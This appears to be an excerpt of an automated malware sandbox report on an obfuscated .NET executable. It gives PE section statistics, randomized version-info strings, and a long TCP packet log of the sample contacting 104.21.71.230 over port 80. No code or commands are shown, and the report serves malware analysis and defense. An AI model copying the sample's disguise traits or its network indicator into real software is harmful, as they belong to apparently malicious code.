Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
.text   0x2000           0x5e64        0x6000    False     0.436645507812   data       6.84633802835    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x8000           0x3e0         0x400     False     0.4658203125     data       3.54455503901    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xa000           0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name        RVA     Size   Type  Language  Country
RT_VERSION  0x8058  0x388  data  English   United States

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
LegalCopyright    Copyright 2022 CjiuFAUH. All rights reserved.
Assembly Version  4.3.4.0
InternalName      VHQefUyV.exe
FileVersion       3.8.6.3
CompanyName       HDCkoRLh
LegalTrademarks   SEpyLMyT
Comments          CATdaEvp
ProductName       VHQefUyV
ProductVersion    4.3.4.0
FileDescription   MGLkYrQM
OriginalFilename  VHQefUyV.exe
Translation       0x0409 0x0514

Possible Origin

Language of compilation system  Country where language is spoken
English                         United States

                                                Network Behavior

                                                TCP Packets

                                                Feb 23, 2021 09:58:14.139008045 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.139084101 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.140249014 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.140273094 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.140338898 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.141484022 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.141509056 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.141571045 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.142764091 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.142791986 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.142841101 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.143980980 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.145359039 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.145381927 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.145467043 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.145972013 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.146022081 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.146039009 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.147278070 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.147309065 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.147356987 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.148487091 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.148521900 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.148567915 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.149758101 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.149782896 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.149842024 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.150980949 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.151124001 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.151535988 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.151563883 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.151622057 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.152795076 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.152822018 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.152885914 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.154032946 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.154058933 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.154123068 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.451675892 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.451721907 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.451842070 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.452200890 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.633054018 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.759520054 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.759552002 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.759690046 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.760020971 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.771716118 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.771754980 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.771848917 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.772253990 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.772294044 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.772361040 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.773483038 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.773519039 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.773688078 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.774660110 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.774688005 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.774840117 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.775851011 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.775876999 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.776007891 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.777051926 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.777476072 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.777518034 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.777549982 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.777659893 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.778717995 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.778755903 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.778903961 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.779913902 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.779937029 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.780127048 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.781147957 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.781174898 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.781289101 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.782358885 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.782386065 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.782566071 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.783577919 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.784027100 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.784066916 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.784236908 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.785259008 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.785285950 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.785468102 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.786454916 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.786489964 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.786622047 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.787663937 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.787693977 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.787800074 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:14.788835049 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:14.789556026 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.096538067 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.096566916 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.096643925 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.097100973 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.097127914 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.097181082 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.098318100 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.098345995 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.098408937 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.119158983 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.119189978 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.119307041 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.119666100 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.119689941 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.119781017 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.120893002 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.120920897 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.120989084 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.122123957 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.122148991 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.122242928 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.123289108 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.123320103 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.123405933 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.124479055 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.124512911 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.124572992 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.125691891 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.125716925 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.125790119 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.423383951 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.423413992 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.423520088 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.423876047 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.432342052 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.432379007 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.432459116 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.432800055 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.432825089 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.432859898 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.434103966 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.434134007 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.434223890 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.435300112 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.435331106 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.435363054 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.436489105 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.436512947 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.436553955 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.437701941 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.437756062 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.440354109 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.440387011 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.440448999 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.440906048 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.440946102 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.441000938 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.442089081 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.442116976 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.442173958 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.443317890 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.443346024 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.443407059 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.444508076 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.444535971 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.444588900 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.445739985 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.446186066 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.446213961 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.446259975 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.447377920 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.447410107 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.447455883 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.448609114 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.448631048 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.448760033 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.449820042 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.449842930 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.449969053 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.450977087 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.450994968 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.451067924 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.453071117 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.453131914 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.453164101 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.453464985 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.453521013 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.453543901 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.523736000 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.743153095 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.743213892 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.743280888 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.744461060 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.744524002 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.744599104 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:15.744885921 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.744930983 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:15.744999886 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.055684090 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.055727005 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.055819035 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.056061029 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.133204937 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.364613056 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.364648104 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.364789963 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.365026951 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.365058899 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.365122080 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.366278887 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.366308928 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.366373062 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.367455006 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.367480993 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.367572069 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.368659973 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.368689060 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.368768930 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.369925022 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.369955063 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.370049000 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.371160984 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.371193886 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.371259928 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.383162975 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.383198977 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.383315086 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.383696079 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.383724928 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.383821964 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.384927988 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.384955883 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.385061979 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.386178017 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.386205912 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.386281967 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.387418985 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.387448072 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.387512922 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.388583899 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.391412020 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.391441107 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.391515970 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.391930103 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.391957998 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.392011881 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:16.393215895 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.393248081 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:16.393307924 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.427478075 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.427511930 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.427681923 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.428242922 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.428275108 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.428390026 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.428998947 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.429033995 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.429140091 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.429775953 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.429807901 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.429898977 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.430577993 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.430608988 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.430774927 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.431330919 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.431360960 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.431485891 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.432128906 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.432161093 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.432326078 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.432888985 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.432921886 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.433056116 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.433700085 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.433741093 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.433829069 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.434468031 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.477571964 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.734060049 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.734100103 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.734302044 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.734355927 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.734378099 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.734869003 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.735152006 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.735178947 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.735389948 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.742897034 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.742942095 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.743174076 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.743216991 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.743242979 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.744016886 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.744056940 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.744066954 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.744185925 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.744779110 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.744815111 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.745462894 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.745573997 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.752008915 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.752046108 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.752160072 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.752336025 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.752361059 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.752428055 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.753143072 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.753170967 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.753293037 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.753925085 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.753953934 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.754059076 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.754714012 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.754852057 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.705960035 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.706048965 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.706190109 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.706222057 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.706259012 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.706418991 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.707001925 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.707072973 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.707191944 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.707746029 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.707798958 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.707889080 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.708566904 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.708630085 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.708714008 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.709342003 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.709427118 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.709500074 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.711940050 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.712004900 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.712078094 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.712903023 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.712965965 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.713011980 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.713032007 CET4971180192.168.2.6104.21.71.230
